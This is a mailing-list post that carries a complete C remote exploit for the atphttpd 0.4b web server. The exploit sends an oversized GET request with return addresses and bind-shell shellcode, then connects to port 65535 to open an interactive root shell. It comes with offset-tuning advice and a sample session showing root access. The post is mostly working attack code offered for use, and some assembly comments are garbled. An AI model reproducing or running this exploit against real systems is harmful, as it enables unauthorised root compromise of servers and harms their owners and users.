<<< Date Index >>>     <<< Thread Index >>>

[eft] Remote atphttpd 0.4b <= exploit



Atphttpd <=0.4b exploit attached..
-- 
[mail: d_fence(at)gmx(dot)net][GPG: 0x4470D90B][bash~# ;-]
[GPG FGPRINT: B681 14F3 8716 CBBA 32A6  3AE5 9E2C 8CCE 4470 D90B]

/******************************* 0-day 
;]****************************************\
**********************************************************************************
** Remote atphttpd <= 0.4b linux exploit by r-code d_fence@xxxxxxx              
**
**                                                                              
**
** The exploit was successfuly tested against Debian 3.0 (Woody)                
**
** and Red Hat 8.0 (Psyche) (both) with atphttpd 0.4b (latest)                  
**
** installed from source..                                                      
**
**                                                                              
**
** The exploit gains the privilages of the user who runs atphttpd               
**
** which is usually root.. the offsets may vary even for the same               
**
** distros.. (e.g. on two different woody`s with the same athttpd               
**
** installed on I got two different offsets working 1300 and 2400), so you      
**
** you might have to play with them...                                          
**
**                                                                              
**
** example:                                                                     
**
**                                                                              
**
** bash~$ ./athttpd localhost 2400                                              
**
**                                                                              
**
**(<->) Atphttpd <= 0.4b remote exploit by r-code d_fence@xxxxxxx               
**
**(<->) Greetz to: czarny,|stachu|, Nitro, Zami, Razor, Jedlik, Cypher          
**
**                                                                              
**
** <==> OFFSET: 0x8fc                                                           
**
** <==> RET_ADDR: 0xbffff6fe                                                    
**
** <==> Connecting to 'localhost' on port '80'..                                
**
** <==> Sending packets..                                                       
OO
**                                                                              
**
** ### Exploit failed ... just kidding ;]                                       
**
** ### Exploit successful - enjoy your shell                                    
**
**                                                                              
**
** uid=0(root) gid=0(root) groups=0(root)                                       
**
**  23:25:51 up  3:21,  1 user,  load average: 0.44, 0.41, 0.42                 
**
**  USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT       
**
**  root     tty1     -                20:05    3:19m  2.32s  2.22s  -bash      
**
**  Linux coredump 2.4.20 #1 czw sie 7 22:04:49 UTC 2003 i686 unknown           
**
** /atphttpd-0.4b                                                               
**
**readline: warning: rl_prep_terminal: cannot get terminal settingsbash-2.05a#  
**
**********************************************************************************
**********************************************************************************/
 


#include <stdio.h>
#include <netinet/in.h>
#include <stdlib.h>
#include <netdb.h>
#include <unistd.h>
#include <sys/socket.h>
#include <errno.h>

/* Bind shellcode (port 65535) by Ramon de Carvalho Valle  */

char shellcode[]= /*  72 bytes                          */
    "\x31\xdb"              /*  xorl    %ebx,%ebx                 */
    "\xf7\xe3"              /*  mull    %ebx                      */
    "\x53"                  /*  pushl   %ebx                      */
    "\x43"                  /*  incl    %ebx                      */
    "\x53"                  /*  pushl   %ebx                      */
    "\x6a\x02"              /*  pushl   -bashx02                     */
    "\x89\xe1"              /*  movl    %esp,%ecx                 */
    "\xb0\x66"              /*  movb    -bashx66,%al                 */
    "\xcd\x80"              /*  int     -bashx80                     */
    "\xff\x49\x02"          /*  decl    0x02(%ecx)                */
    "\x6a\x10"              /*  pushl   -bashx10                     */
    "\x51"                  /*  pushl   %ecx                      */
    "\x50"                  /*  pushl   %eax                      */
    "\x89\xe1"              /*  movl    %esp,%ecx                 */
    "\x43"                  /*  incl    %ebx                      */
    "\xb0\x66"              /*  movb    -bashx66,%al                 */
    "\xcd\x80"              /*  int     -bashx80                     */
    "\x89\x41\x04"          /*  movl    %eax,0x04(%ecx)           */
    "\xb3\x04"              /*  movb    -bashx04,%bl                 */
    "\xb0\x66"              /*  movb    -bashx66,%al                 */
    "\xcd\x80"              /*  int     -bashx80                     */
    "\x43"                  /*  incl    %ebx                      */
    "\xb0\x66"              /*  movb    -bashx66,%al                 */
    "\xcd\x80"              /*  int     -bashx80                     */
    "\x59"                  /*  popl    %ecx                      */
    "\x93"                  /*  xchgl   %eax,%ebx                 */
    "\xb0\x3f"              /*  movb    -bashx3f,%al                 */
    "\xcd\x80"              /*  int     -bashx80                     */
    "\x49"                  /*  decl    %ecx                      */
    "\x79\xf9"              /*  jns     <bindsocketshellcode+45>  */
    "\x68\x2f\x2f\x73\x68"  /*  pushl   -bashx68732f2f               */
    "\x68\x2f\x62\x69\x6e"  /*  pushl   -bashx6e69622f               */
    "\x89\xe3"              /*  movl    %esp,%ebx                 */
    "\x50"                  /*  pushl   %eax                      */
    "\x53"                  /*  pushl   %ebx                      */
    "\x89\xe1"              /*  movl    %esp,%ecx                 */
    "\xb0\x0b"              /*  movb    -bashx0b,%al                 */
    "\xcd\x80"              /*  int     -bashx80                     */;

#define LEN 820
#define DEFAULT_OFFSET 2400         /* Offsets might be betwen 1000-3000 , you 
can try in 100 steps*/
#define PORT 80                     /* Default port */
#define ALIGN 1
    
int connect_to_host(char *hs,int port)
{
        int                     sock,x;
        struct sockaddr_in      addr;
        struct hostent  *host;
        
        if(!(host = gethostbyname(hs))) {
                perror("gethostbyname(): while resolving host");
                exit(1);
        }
        
        
        addr.sin_family = AF_INET;
        addr.sin_port = htons(port);
        bcopy(host->h_addr,&addr.sin_addr,host->h_length);

        if((sock = socket(AF_INET, SOCK_STREAM, 0))<0)         {
                perror("socket() error");
                return(-1);
        }

        if((x = connect(sock, (struct sockaddr *)&addr, sizeof(addr)))<0) {
                perror("connect() error");
                return(-1);
        }

        return sock;
}



void shell(int sd)
{
            int check;
            char cmd[]="id; w; uname -a; pwd;export TERM=vt100; exec /bin/bash 
-i\n";
            char buf[2048];
            fd_set fd;

            bzero(buf,2048);
            send(sd,cmd,strlen(cmd),0);

            while(1)  {
        
                    fflush(stdout);
                    FD_ZERO(&fd);
                    FD_SET(sd,&fd);
                    FD_SET(STDIN_FILENO,&fd);
                    select(sd+1,&fd,NULL,NULL,NULL);
                
                    if(FD_ISSET(sd,&fd))   {
                            if((check=read(sd,buf,2048))<=0)
                                    exit(1);
                        
                        buf[check]=0;
                        printf("%s",buf);
                    }
                
                    if(FD_ISSET(STDIN_FILENO,&fd))    {
                            if((check=read(STDIN_FILENO,buf,2048))>0) {
                                buf[check]=0;
                                write(sd,buf,check);
                            }
                    }
            }
            return;
}




int main(int argc,char **argv) {
        int i,sd;
        char http_req[LEN];
        unsigned long int ret=0,offset=DEFAULT_OFFSET;


        printf("(<->) Atphttpd <= 0.4b remote exploit by r-code 
d_fence@xxxxxxx\n");
        printf("(<->) Greetz to: czarny,|stachu|, Nitro, Zami, Razor, Jedlik, 
Cypher\n\n");
        

        if(argc<2 || argc>3){
                printf("[-] Usage: %s [host] <offset> #OFFset\n",argv[0]);
                return -1;
        }
                        
        
        if(argc>2)
                offset=atoi(argv[2]);
        
        ret=0xbffffffa - offset;
        
        printf("<==> OFFSET: 0x%x\n",offset);
        printf("<==> RET_ADDR: 0x%x\n",ret);
                        

        /* See comment few lines below ;] */
        
        http_req[0x00]='G';
        http_req[0x01]='E';
        http_req[0x02]='T';
        http_req[0x03]=' ';
        http_req[0x04]='/';
        
         for(i=0x05;i<LEN;) {
                 http_req[ALIGN + i++] = (ret & 0x000000ff);
                 http_req[ALIGN + i++] = (ret & 0x0000ff00) >> 8;
                 http_req[ALIGN + i++] = (ret & 0x00ff0000) >> 16;
                 http_req[ALIGN + i++] = (ret & 0xff000000) >> 24;
         }

        
         for(i=0x05;i<(LEN/2);i++)
                 http_req[i]=0x41;          /* Using jump-next instruction 
instead of nops for a better look ;] */
             
         for(i=0;i<strlen(shellcode);i++)
                 http_req[(LEN/2)-(strlen(shellcode)/2)+i]=shellcode[i];
                     
         
        http_req[LEN-0x0c]=' ';
        http_req[LEN-0x0b]='H';
        http_req[LEN-0x0a]='T';
        http_req[LEN-0x09]='T';
        http_req[LEN-0x08]='P';
        http_req[LEN-0x07]='/';
        http_req[LEN-0x06]='1';
        http_req[LEN-0x05]='.';
        http_req[LEN-0x04]='1';
        http_req[LEN-0x03]=0x0d;
        http_req[LEN-0x02]=0x0a;
        http_req[LEN-0x01]=0x00;

        /* Yeah.. I know I just could strcpy/cat it ;].. but so it looks 
soooooo l33t ;] aint`t it ? ;) */
        
        printf("<==> Connecting to '%s' on port '%d'..\n",argv[1],PORT);
        
        if((sd=connect_to_host(argv[1],PORT))<0) {
                printf("<==> Couldn`t connect to host.. :-/\n");
                exit(1);
        }
        
        printf("<==> Sending packets..\n");
                        
                
        if(send(sd,http_req,LEN,0)<0) {
                perror("<==> send(): while sending evil http request");
                return -1;
        }

        close(sd);
                
        if((sd=connect_to_host(argv[1],65535))<0) {
                printf("<==> Exploit failed..! #Probably due to a bad 
offset\n");
                return -1;
        }


        printf("\n### Exploit failed ");
        fflush(stdout);
        sleep(1);
        printf("... just kidding ;]\n");
        sleep(1);
        printf("### Exploit successful - enjoy your shell\n\n");
        shell(sd);
        
        return 1;
}